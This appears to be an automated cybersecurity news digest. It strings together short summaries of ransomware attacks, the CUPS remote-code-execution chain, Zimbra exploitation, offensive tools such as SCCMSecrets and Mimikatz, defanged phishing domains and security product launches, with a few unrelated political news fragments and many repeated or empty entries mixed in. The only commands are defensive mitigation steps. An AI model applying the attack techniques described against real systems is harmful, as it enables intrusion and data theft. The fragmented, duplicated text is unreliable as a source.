Unified exposure risk scoring across the ecosystem Balbix D3 introduces a unified risk score for both CVEs and non-CVEs, enabling organizations to prioritize exposures across their infrastructure, applications, and user environments using a consistent risk-based framework. "Safe Security launched SAFE X, a generative AI-powered mobile app for CISOs. SAFE X delivers CISOs real-time business impact insights into their cybersecurity posture, enabling better decision-making and risk prioritization. CISOs often invest millions of dollars in building their cyber stacks, yet they lack critical business impact insights to prioritize and protect their organization effectively. Instead, they are bogged down by a patchwork of manual reports and outdated dashboards that lack business context and offer … More
The post SAFE X equips CISOs with integrated data from all their existing cybersecurity products appeared first on Help Net Security.
"Autosummary:
“Unlike traditional solutions, SAFE X offers CISOs a unified platform for daily, on-demand, access to critical cyber risk data, enabling them to make data-driven decisions to protect their business,” said Brandon Pinzon, former CSO of Argo Group. With the launch of SAFE X, CISOs can now prioritize and immediately act on cyber risks that have the greatest material impact on the business—whether financial, reputational, operational, or compliance-related. "Autosummary:
Some of the other programs used in the intrusions are Mimikatz, Sliver, Chisel, PuTTY, Plink, Snap2HTML, and FastReverseProxy (FRP), all of which are either open-sourced or publicly available. "Autosummary:
The researchers reverse-engineered Zimbra"s patch to find that the "popen" function, which receives user input, has been replaced with a new function named "execvp," which features an input sanitization mechanism. "Autosummary:
More_eggs, sold as a malware-as-a-service (MaaS), is a malicious software that comes with capabilities to siphon credentials, including those related to online bank accounts, email accounts, and IT administrator accounts. "Autosummary:
"Autosummary:
As part of each analysis session in ANY.RUN, you get a comprehensive IOC report In ANY.RUN, you can quickly gather a variety of indicators, including file hashes, malicious URLs, C2 connections, DNS requests, and more. Analysis of HTTP requests, connections, and DNS requests can provide insights into the malware"s communication with external servers, the type of data being exchanged, and any malicious activities. You can manually enter a password to open protected archives in ANY.RUN After launching the executable file found inside the archive, the sandbox instantly detects that the system has been infected with AsyncRAT, a popular malware family used by attackers to remotely control victims" machines and steal sensitive data. "Autosummary:
The emails spoofing Gmail were sent to bogus addresses in the CC fields in an attempt for Zimbra servers to parse and execute… https://t.co/VmnQkDypkg pic.twitter.com/RJr9jawwWl — Threat Insight (@threatinsight) October 1, 2024 “Beginning on September 28, @Proofpoint began observing attempts to exploit CVE-2024-45519, a remote code execution vulnerability in Zimbra mail servers. "Autosummary:
Reuters There were cheers inside Congress, where the governing party has a majority She began her first speech as president by thanking her political mentor and predecessor in the top job, Andrés Manuel López Obrador, calling him “the most important political leader and social warrior in Mexico’s modern history". "Autosummary:
"Autosummary:
"Autosummary:
FakeUpdate is a cyberattack strategy used by a threat group known as "SocGolish" who compromises or creates fake websites to show visitors fake update prompts for a variety of applications, such as web browsers, Java, VMware Workstation, WebEx, and Proton VPN. "Autosummary:
According to Silent Push, FIN7 directly operated sites like "aiNude[.]ai", "easynude[.]website", and nude-ai[.]pro," which offered "free trials" or "free downloads," but in reality just spread malware. "Autosummary:
"Autosummary:
A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. "For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report. "As an integral part of the Halcyon Anti-Ransomware Platform, Halcyon Linux offers protection against ransomware attacks targeting Linux systems. While ransomware operators were once almost exclusively focused on targeting Windows environments, the introduction of Linux variants represents a significant expansion of the addressable target range. In 2023, Linux-based ransomware attacks increased by 75% yet Linux-based systems and endpoints are often overlooked and without ransomware defenses. “When it comes to ransomware protection, organizations typically prioritize securing … More
The post Halcyon offers ransomware protection for Linux environments appeared first on Help Net Security.
"Autosummary:
"Veeam Software announced the addition of new Veeam Recon Scanner technology to Veeam Data Platform. This technology, developed by Coveware by Veeam, draws on years of experience in cyber-extortion incident response and the largest database of cyber incidents in the world. Veeam Recon Scanner is designed to proactively identify, triage, and prevent cyberattacks, revolutionizing threat assessment in the data protection market. “Protecting your organization from a cyber-attack requires a coordinated strategy. It starts at the … More
The post Veeam Recon Scanner identifies adversary tactics, techniques, and procedures appeared first on Help Net Security.
"Autosummary:
“By collecting and analyzing data proactively, Recon Scanner identifies unexpected network connections, unusual user behavior, suspicious file activity, data exfiltration attempts, and even potential brute force attacks. "RSA and Swissbit announced that RSA will start introducing its next-generation hardware authenticators RSA iShield Key 2 series powered by Swissbit alongside RSA ID Plus for Government. Built to meet the highest security standards, the RSA iShield Key 2 and the RSA iShield Key 2 Pro feature FIDO2, PIV, HOTP support and a FIPS 140-3 certified smart chip and can provide the private sector and U.S. federal agencies, systems integrators, and government contractors with a … More
The post RSA and Swissbit join forces to secure government agencies appeared first on Help Net Security.
"Autosummary:
By aligning their efforts with international regulatory bodies, RSA and Swissbit will empower federal agencies and the private sector with secure, user-friendly authentication practices to achieve optimal Zero Trust Architecture (ZTA) with: Phishing-resistant multi-factor authentication (MFA), via the RSA DS100, RSA Authenticator App, and the RSA iShield Key 2 series, powered by Swissbit Identity governance and administration (IGA) and lifecycle capabilities, via RSA Governance & Lifecycle Machine learning-driven, contextual authentication, via RSA Risk AI A FedRAMP-authorized access and cloud service, via RSAID Plus for Government Provisioned, managed, and updated as part of a secure supply chain, the RSA iShield Key 2 series complies with stringent federal regulations and offers premium security capabilities for protecting sensitive data and critical infrastructure. "The JPCERT Coordination Center – the first Computer Security Incident Response Team established in Japan – has compiled a list of entries in Windows event logs that could help enterprise defenders respond to human-operated ransomware attacks and potentially limit the malware’s damage. “The difficult part of the initial response to a human-operated ransomware attack is identifying the attack vector,” the organization pointed out. Detecting specific entries in Windows event logs – Application, Security, System, Setup … More
The post Use Windows event logs for ransomware investigations, JPCERT/CC advises appeared first on Help Net Security.
"Autosummary:
"Autosummary:
It is responsible for collecting, verifying, cross-checking and disseminating information, in a neutral, factual form, intended to be used directly by all types of media (radio, television, written press, websites) and also to serve as a source and alert for large companies and administrations. "Autosummary:
Ransomware attacks are typically accompanied by data theft, and in this case, the sensitive medical information of hundreds of thousands could be impacted. "Autosummary:
"Eduard Benderskiy (Benderskiy), a former Spetnaz officer of the Russian Federal Security Service (FSB), which is designated under numerous OFAC sanctions authorities, current Russian businessman, and the father-in-law of Evil Corp"s leader Maksim Viktorovich Yakubets (Maksim), has been a key enabler of Evil Corp"s relationship with the Russian state," alleges the U.S. Department of the Treasury announcement. The sanctioned individuals are Eduard Benderskiy (Maksim"s father-in-law), Viktor Grigoryevich Yakubets (Maksim"s father), Aleksandr Viktorovich Ryzhenkov, Sergey Viktorovich Ryzhenkov, Aleksey Yevgenevich Shchetinin, Beyat Enverovich Ramazanov, and Vadim Gennadievich Pogodin. "Autosummary:
Additional LockBit arrests and charges LockBit emerged in September 2019 and has since claimed responsibility for and been linked to attacks against many high-profile companies and organizations worldwide, including Bank of America, Boeing, the Continental automotive giant, the Italian Internal Revenue Service, and the UK Royal Mail. "Autosummary:
UMC Health System diverted patients following a ransomware attack Pierluigi Paganini October 01, 2024 October 01, 2024 US healthcare provider UMC Health System had to divert patients due to a network outage caused by a ransomware attack.It’s unclear if threat actors had exfiltrated patients’ data during the attack Healthcare infrastructure in the US continues to be under attack, in July, the Lockbit ransomware gang breached the Fairfield Memorial Hospital in Illinois. "Autosummary:
"Autosummary:
Reward: $500 - $2,500 : Vulnerabilities affecting multiple tabs, limited session/data impact, or partial access to sensitive info (may require user interaction). "Autosummary:
In an email sent to customers and seen by The Register, Rackspace warned that the hackers exploited the zero-day to gain access to web servers and steal limited customer monitoring data, including customer account names and numbers, customer usernames, Rackspace internally generated device IDs, device name and information, IP addresses, and AES256 encrypted Rackspace internal device agent credentials. "Autosummary:
Alureon Spyware With Child Pornography Download Detected“: The page contains a background image with pornographic material, as if it were from sites victims may have visited: Despite the scary warning page, this is all a scam and you do not need to call the phone number shown on screen. "Autosummary:
Beyond tips and tricks After a decade of promoting the same guidance (Cybersecurity Awareness Month itself marks its 21st anniversary this year), it’s time for the industry to have a radical rethink and, alongside doing the talking, legislate and enforce better cybersecurity practices, especially where personally identifiable information (PII) or other data of value is at stake.Without even looking at the official theme of this year’s edition of the campaign, I rattled off the usual advice to a colleague last week – use strong and unique passwords, enable multi-factor authentication (MFA), and avoid clicking on phishing links – and sure enough, I captured almost all the main points of this year’s official “Secure Our World” theme. "SCCMSecrets is an open-source tool that exploits SCCM policies, offering more than just NAA credential extraction. SCCM policies are a key target for attackers in Active Directory environments, as they can expose sensitive technical information, including account credentials. Attackers may retrieve these credentials by impersonating a registered device with authenticated access or, in some cases, even from an unauthenticated position by exploiting misconfigurations in policy distribution. SCCMSecrets provides a thorough approach to identifying and exploiting … More
The post SCCMSecrets: Open-source SCCM policies exploitation tool appeared first on Help Net Security.
"Autosummary:
"Storm-0501, an affiliate of several high-profile ransomware-as-a-service outfits, has been spotted compromising targets’ cloud environments and on-premises systems. “Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises,” Microsoft shared last week. Common tactics and … More
The post Ransomware attackers hop from on-premises systems to cloud to compromise Microsoft 365 accounts appeared first on Help Net Security.
"Autosummary:
They engage in a concerted effort to compromise as many credentials they can, by using Impacket, gathering KeePass secrets from the compromised devices, and possibly via brute force They use Cobalt Strike (and compromised credentials) to “move” to additional endpoints and servers, including domain controllers They interfere with endpoint security solutions, use the Rclone tool to exfiltrate data, and they deploy the Embargo ransomware through scheduled tasks and Group Policy Object (GPO) policies. "Autosummary:
" A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has been now found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines.A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has been now found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines. 🔒 Tip of the Week Prevent Data Leaks to AI Services: Protect sensitive data by enforcing strict policies against sharing with external AI platforms, deploying DLP tools to block confidential transmissions, restricting access to unauthorized AI tools, training employees on the risks, and using secure, in-house AI solutions.In yet another law enforcement action, the U.S. government charged three Iranian nationals, Masoud Jalili, Seyyed Ali Aghamiri, and Yasar (Yaser) Balaghi, who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data in an attempt to interfere with the upcoming elections."Incorporating Tails into the Tor Project"s structure allows for easier collaboration, better sustainability, reduced overhead, and expanded training and outreach programs to counter a larger number of digital threats," the organizations said. "Autosummary:
" AFP is an award-winning Paris-based news agency with a presence in 150 countries, employing over 2,400 people in 260 cities, and covering news in French, English, Arabic, Portuguese, Spanish, and French. "Autosummary:
“The personal information that was potentially impacted included first and last names with one or more of the following identifiers: Social Security Number, Date Of Birth, Driver’s License Number / State Id Number, Passport Number, Financial Account Number, Routing Number, Bank Name, Credit / Debit Card Number, Card CVV Expiration Date, Pin/Security Code, Login Information, Medical Diagnosis, Clinical Information, Medical Treatment/Procedure Information, Treatment Type, Treatment Location, Treatment Cost Information, Doctor’s Name, Medical Record Number, Patient Account Number, Prescription Information and/ or Biometric Data. Mālama investigated the security breach with external cybersecurity professionals, and on August 7, 2024, the experts determined that personal data may ‘have been subject to unauthorized access and acquisition between May 4, 2024 and May 7, 2024.’ "Autosummary:
"Autosummary:
Characteristic Bisamware ransomware logs Source: JPCERT/CC JPCERT/CC also notes that seemingly unrelated ransomware variants such as Shade, GandCrab, AKO, AvosLocker, BLACKBASTA, and Vice Society, leave behind very similar traces (event IDs: 13, 10016). "Autosummary:
"Autosummary:
Patelco Credit Union data breach impacted over 1 million people Pierluigi Paganini September 30, 2024 September 30, 2024 The ransomware attack on Patelco Credit Union this summer led to a data breach affecting over 1 million individuals, revealed the company. "Autosummary:
"Autosummary:
"Autosummary:
The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb). "Autosummary:
And nor, it seems, for the social media giants whose algorithms, time and time again, are accused of prioritising engagement over safety, pushing content regardless of the reaction it can provoke.Kay, 26, and Parlour, 28, have been sentenced to 38 months and 20 months in prison respectively for stirring up racial hatred online during the summer riots.But while accountability has been felt at “the very sharp end” by those who participated in the disorder and posted hateful content online, Mr Jukes said “the people who make billions from providing those opportunities” to post harmful content on social media “have not really paid any price at all”.The UK’s head of counter-terror policing, Assistant Commissioner Matt Jukes, told me for the BBC’s Newscast that “X was an enormous driver” of posts that contributed to the summer’s disorder. "IoT devices have become integral to how many organizations operate. From Smart TVs in conference rooms to connected sensors and wireless security cameras, these connected devices are now a fixture in the modern workplace. They also, however, present a real and often overlooked cybersecurity threat. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, … More
The post 3 tips for securing IoT devices in a connected world appeared first on Help Net Security.
"Autosummary:
When segmenting your network, organizations should: Isolate IoT devices Use VLANs and firewalls with security controls between network segments Employ zero-trust architecture Access control is the process of defining and enforcing policies that dictate who or what can access specific resources within a network. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, alongside ensuring secure deployment practices. "In this Help Net Security interview, Nadir Izrael, CTO at Armis, discusses how AI has transformed cyberwarfare by amplifying attacks’ scale and sophistication. Izrael emphasizes the need for AI-powered defenses and proactive cybersecurity strategies to combat these evolving threats. How has adopting AI transformed the nature of cyberwarfare, and what specific capabilities does it offer to threat actors? AI has transformed the nature of cyberwarfare. Threat actors can amplify the scale and sophistication of attacks … More
The post Developing an effective cyberwarfare response plan appeared first on Help Net Security.
"Autosummary:
Armis Labs has identified several threat actors actively using AI to advance their cyber capabilities, including Russian-affiliated Forest Blizzard (APT28), North Korean hackers Emerald Sleet (Kimusky), Iranian threat actors Crimson Sandstorm (Imperial Kitten), and Chinese state-affiliated groups Charcoal Typhoon (Aquatic Panda) and Salmon Typhoon (Maverick Panda).To do this, organizations need a comprehensive strategy that proactively identifies and mitigates cyber asset risks, remediates security findings and vulnerabilities, and protects the entire attack surface.In this Help Net Security interview, Nadir Izrael, CTO at Armis, discusses how AI has transformed cyberwarfare by amplifying attacks’ scale and sophistication. "Autosummary:
"With this access, the attacker can now reach the Container Runtime Unix sockets (docker.sock/containerd.sock)," security researchers Shir Tamari, Ronen Shustin, and Andres Riancho said. "After much hyping and following prematurely leaked information by a third party, security researcher Simone Margaritelli has released details about four zero-day vulnerabilities in the Common UNIX Printing System (CUPS) that can be abused by remote, unauthenticated attackers to achieve code execution on vulnerable Linux and Unix-like sistems. The CUPS vulnerabilities CUPS is an open-source printing system that allows a computer on which is installed to act as a print server. It is developed by … More
The post CUPS vulnerabilities affecting Linux, Unix systems can lead to RCE appeared first on Help Net Security.
"Autosummary:
The vulnerabilities discovered by Margaritelli (aka EvilSocket) affect several CUPS components/packages: CVE-2024-47176 , in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it to request arbitrary, attacker-controlled URLs , in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it to request arbitrary, attacker-controlled URLs CVE-2024-47076 , in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components , in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components CVE-2024-47175 , in libppd (up to version 2.1b1), which allows attackers to inject malicious data in the temporary PPD file to pass to CUPS components , in libppd (up to version 2.1b1), which allows attackers to inject malicious data in the temporary PPD file to pass to CUPS components CVE-2024-47177, in cups-filters (up to version 2.0.1) , which allows attackers to execute arbitrary commands via the FoomaticRIPCommandLine PPD parameter By chaining some of these flaws, “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP URLs with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer),” Margaritelli explained. "Autosummary:
Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware. "Autosummary:
For employers, certified professionals bring enhanced work quality, productivity, and innovation to the table, making certifications a win-win for everyone involved.Furthermore, certified professionals tend to have greater work autonomy, with 74% experiencing more independence, which fosters a culture of innovation within organizations. "Autosummary:
"The scripts" structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "Autosummary:
Elliptic, another blockchain intelligence firm, said it"s aware of "thousands of additional addresses" connected to Cryptex, PM2BTC, PinPays, and Joker"s Stash, outside of the four cryptoasset addresses listed by the Treasury as tied to Cryptex. "Autosummary:
"Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization" Microsoft "We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network," Microsoft said. "Autosummary:
" The only information available is that the six vulnerabilities were reported by Summoning Team"s Sina Kheirkhah, Trend Micro"s Andy Niu, and Tenable researchers and were assigned the following CVE IDs and CVSS base scores: CVE-2024-46905 : CVSS 8.8/10 (reported by Sina Kheirkhah) : CVSS 8.8/10 (reported by Sina Kheirkhah) CVE-2024-46906 : CVSS 8.8/10 (reported by Sina Kheirkhah) : CVSS 8.8/10 (reported by Sina Kheirkhah) CVE-2024-46907 : "Autosummary:
The list of vulnerabilities is as follows - CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL CVE-2024-47076 - libcupsfilters <= 2.1b1 "Autosummary:
* Canonical, RedHat and… pic.twitter.com/N2d1rm2VeR — Simone Margaritelli (@evilsocket) September 23, 2024 Information about the Linux vulnerability was leaked on GitHub, for this reason, the Italian researcher decided to release the technical details and published a proof-of-concept (PoC) exploit on September 26, 2024. To stop a running cups-browsed service, an administrator should use the following command: $ sudo systemctl stop cups-browsed The cups-browsed service can also be prevented from starting on reboot with: $ sudo systemctl disable cups-browsed Blocking all traffic to UDP port 631 and DNS-SD traffic can also mitigate attacks. The researcher disclosed four vulnerabilities, tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, impacting the CUPS (Common UNIX Printing System) open-source printing system. "Autosummary:
"The government inherited a disastrous situation, the worst inheritance that a government has received in a democracy, perhaps one of the worst that a government has received in history," he added. "Autosummary:
Notable platforms taken down as a result of the operation, codenamed "Final Exchange," include Xchange.cash, 60cek.org, Bankcomat.com, and Banksman.com, which collectively had over 1.2 million accounts and processed over 3.5 million transactions. "Autosummary:
The protesters waved a banner commemorating the 43 missing student teachers An initial investigation, under then-President Enrique Peña Nieto, concluded that corrupt municipal police from Iguala and surrounding towns, acting on orders from the local mayor, handed the students over to the Guerreros Unidos drug cartel.Under her theory, the Mexican Army, acting on behalf of drug traffickers, intercepted the shipment, leading to the students" deaths to eliminate any witnesses. "Autosummary:
Q2 in numbers Parameter Q1 2024 Q2 2024 Quarterly changes Global percentage of attacked ICS computers 24.40% 23.50% -0.9 pp Percentage of ICS computers on which malicious objects from different categories were blocked Denylisted internet resources 6.84% 6.63% -0.21 pp Malicious scripts and phishing pages (JS and HTML) 5.84% 5.69% -0.15 pp Spy Trojans, backdoors and keyloggers 3.90% 4.08% 0.18 pp Malicious documents (MSOffice + PDF) 1.72% 1.96% 0.24 pp Viruses 1.56% 1.54% -0.02 pp Worms 1.51% 1.48% -0.03 pp Miners in the form of executable files for Windows 0.92% 0.89% -0.03 pp Web miners running in browsers 0.49% 0.50% 0.01 ppThis group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Сomputers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Malicious object categories Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: Malicious objects used for initial infection Next-stage malware Self-propagating malware Malicious objects used for initial infection Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents. Percentage of ICS computers on which malicious objects were blocked, by month, 2022-2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 11.3% in Northern Europe to 30% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 The percentage of ICS computers on which malicious objects were blocked in the second quarter of 2024 was highest in May and lowest in June. "Autosummary:
Industrial control systems manage and regulate processes in the WWS sector such as water filtration, chemical treatment, and pumping stations - ensuring that they operate within safe parameters, maintain the quality of drinking water, and prevent contamination to the environment. "Active Directory (AD), Microsoft’s on-premises directory service for Windows domain networks, is so widely used for enterprise identity and access management that compromising it has become almost a standard step in cyber intrusions. “Active Directory is susceptible to compromise due to its permissive default settings, its complex relationships, and permissions; support for legacy protocols and a lack of tooling for diagnosing Active Directory security issues,” Five Eyes cybersecurity agencies have clarified in a recently released … More
The post Active Directory compromise: Cybersecurity agencies provde guidance appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The model works by collecting a wide range of vulnerability information from various sources, such as the National Vulnerability Database (NVD), CISA KEV, and Exploit-DB, along with evidence of exploitation activity. Improving prioritization with exploit data To improve vulnerability prioritization, organizations should move beyond CVSS scores and consider other factors, such as exploitation activity identified in the wild.For example, if EPSS indicates a high probability of exploitation for a vulnerability with a relatively low CVSS score, security teams might consider prioritizing that vulnerability over others that may have higher CVSS scores but a lower likelihood of exploitability. "Autosummary:
"Cryptex is also associated with over $720 million in transactions to services frequently used by Russia-based ransomware actors and cybercriminals, including fraud shops, mixing services, exchanges lacking KYC programs, and OFAC-designated virtual currency exchange Garantex," the Treasury said. "Autosummary:
The remaining DoS flaws discovered by Talos are tracked as CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, and CVE-2024-39590. "Autosummary:
“The threat actor was attempting to steal all data stored in the active directory, compromising every single username and password in the organization, along with other personally identifiable information, billing data, call detail records, credentials, email servers, geo-location of users, and more.” Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered.“ In August, Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations. Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files. "Autosummary:
No patches, but mitigation measures are available While patches are still in development, Red Hat shared mitigation measures requiring admins to stop the cups-browsed service from running and prevent it from being started on reboot using the following commands to break the exploit chain: sudo systemctl stop cups-browsed sudo systemctl disable cups-browsed Red Hat users can also use the following command to find out if cups-browsed is running on their systems: sudo systemctl status cups-browsed If the result displays "Active: inactive (dead)," then the exploit chain is halted, and the system is not vulnerable. "Autosummary:
Doing so triggers a series of redirects across multiple domains under the attacker"s control ("fastshare[.]click," "docstorage[.]link," and "publicshare[.]link"), ultimately delivering a malicious executable downloader from file-sharing platforms like "temp[.]sh". "CISO Guardz | Israel | Hybrid – View job details As a CISO, you will develop and implement security policies and procedures to enhance the security of the company’s IT environment. Develop, implement, and maintain a comprehensive information security strategy to protect company data, production systems, and networks from threats; ensure compliance with relevant security standards, regulations, and best practices (PCI DSS, SOX, ISO 27001, etc). Cloud Security Architect Nuix | Australia | Hybrid – … More
The post Cybersecurity jobs available right now: September 25, 2024 appeared first on Help Net Security.
"Autosummary:
(Senior) Test Engineer Cybersecurity – SDV Hub CARIAD | Germany | On-site – View job details As a (Senior) Test Engineer Cybersecurity – SDV Hub, you will conduct comprehensive security testing, including penetration testing, vulnerability assessments, and ethical hacking, to identify and address potential security risks in automotive systems.Develop, implement, and maintain a comprehensive information security strategy to protect company data, production systems, and networks from threats; ensure compliance with relevant security standards, regulations, and best practices (PCI DSS, SOX, ISO 27001, etc). Cloud Security Architect Nuix | Australia | Hybrid – View job details As a Cloud Security Architect, you will design, build, and secure cloud architecture on AWS and Azure, utilizing tools like Lacework, Mend, and SonarQube for continuous security and compliance. Information Security and Data Protection Manager Taaleem | UAE | On-site – View job details As an Information Security and Data Protection Manager, you will develop and maintain information security policies, standards, procedures, and guidance. "CVE-2024-7593, a critical authentication bypass vulnerability affecting Ivanti Virtual Traffic Manager (vTM) appliances, is actively exploited by attackers. The confirmation comes from the Cybersecurity and Infrastructure Security Agency (CISA), which added the flaw to its Known Exploited Vulnerabilities catalog, thus mandating all US federal civilian executive branch agencies to remediate it by October 15, 2024. About CVE-2024-7593 Ivanti Virtual Traffic Manager is a software-based application delivery controller and load balancing solution. It includes a web-based … More
The post Ivanti vTM auth bypass flaw exploited in attacks, CISA warns (CVE-2024-7593) appeared first on Help Net Security.
"Autosummary:
"ManageEngine announced a significant upgrade to its flagship IT analytics solution, Analytics Plus. Version 6.0 introduces Spotlight, a contextual recommendations engine powered by AI, designed to identify key inefficiencies in IT operations and suggest corrective strategies. The 2023 State of Analytics Engineering report found that time to business insight is the biggest challenge for nearly 50% of surveyed directors. Spotlight dramatically reduces the time IT managers and CIOs spend analyzing various IT metrics and coming … More
The post ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations appeared first on Help Net Security.
"Autosummary:
Deriving meaningful and context-specific insights is becoming increasingly challenging due to a significant disconnect: the people performing the analysis are skilled at mining data but often lack the IT context, making it difficult to translate findings into actionable business decisions,” said Samantha Hall, service delivery manager, Leathams Ltd., a UK-based food supplying company. In addition to these key features, Analytics Plus version 6.0 includes a range of productive enhancements such as multivariate forecasting, workflow charts, support for distributed processing (on-premises) and more than 10 new integrations with popular IT tools. "Autosummary:
" The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS). "Autosummary:
"Autosummary:
U.S. CISA adds Ivanti Virtual Traffic Manager flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini September 25, 2024 September 25, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Virtual Traffic Manager vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
Over the years, Octo malware campaigns targeted regions worldwide, including Europe, the USA, Canada, the Middle East, Singapore, and Australia. "Autosummary:
If you’ve been impacted by a romance scam, pig butchering, or crypto investment fraud, you can report the crime to the Internet Crimes Complaint Center (IC3), which is run by the FBI, or the FTC on its reporting and resources page. Demographics of romance scams The majority of survey respondents were subject to romance scam advances within the last year, with 37 percent saying it happened within the last six months, and an additional 15 percent saying it happened between six months and one year ago. Unfortunately, that leaves 26 percent engaging with romance scammers for more than two weeks, with 12 percent spending several months talking to pretend paramours, and 5 percent in a faux relationship for one year or more.In 2023, romance scam victims—not counting those who reported crypto investment fraud—lost a median of $2,000 per person, the highest reported losses for any form of imposter scam, according to the FTC. For a full breakdown of survey results, including demographics, scammer tactics, and financial and emotional impacts, read below. "Autosummary:
Instead, it’s traded through a bustling network of “data brokers” that work tirelessly to collect and sell people’s names, addresses, phone numbers, bankruptcy records, salaries, marital statuses, and more. "Details about and proof-of-concept (PoC) exploit code for CVE-2024-28987, a recently patched SolarWinds Web Help Desk (WHD) vulnerability that could be exploited by unauthenticated attackers to remotely read and modify all help desk ticket details, are now public. “When assessing the exposure of our own clients, we found that organizations typically revealed sensitive process information for IT procedures such as user onboarding, password resets, and accessing shared resources. While this vulnerability does not lead to … More
The post PoC for critical SolarWinds Web Help Desk vulnerability released (CVE-2024-28987) appeared first on Help Net Security.
"Autosummary:
"Malwarebytes introduced its latest consumer product, Personal Data Remover, designed to protect user privacy by assisting users with the deletion of personal information from data broker databases and people search sites. This new solution offers regular monitoring to ensure individuals’ data remains private, providing a robust defense against data misuse that can lead to stalking, spam, and identity theft. Today, data brokers have nearly 1,500 data points for every consumer, ranging from addresses and phone … More
The post Malwarebytes Personal Data Remover protects user privacy appeared first on Help Net Security.
"Autosummary:
Key features of Personal Data Remover Malwarebytes Personal Data Remover scans a network of data broker databases and people search sites, assisting users in removing their personal details, and offering ongoing monitoring to maintain their online privacy, automating up to 318 hours of work a consumer would have to undertake themselves. "Autosummary:
"As new APIs are added to Windows, new ideas for injection techniques are appearing," security researcher Aleksandra "Hasherezade" Doniec said. "Autosummary:
Complex URL with redirects In this case, after the initial "Google" in the URL, you see 2 other instances of "Google," which is a clear sign of a redirection attempt and misuse of the platform. Example: Suspicious page title along with broken Microsoft favicon analyzed inside ANY.RUN In this Safebrowsing session, you"ll notice how the page title and favicon don"t align with what you would expect from a legitimate Microsoft Office login page. Example: Interface elements mimicking Adobe PDF Viewer In this Safebrowsing session, attackers mimicked Adobe PDF Viewer, embedding its password input form. Example: Cloudflare verification abuse observed in ANY.RUN"s Safebrowsing session In this analysis session, attackers use Cloudflare verification as a deceptive layer in their phishing scheme to add legitimacy and obscure their malicious intent. "Autosummary:
"Autosummary:
"Autosummary:
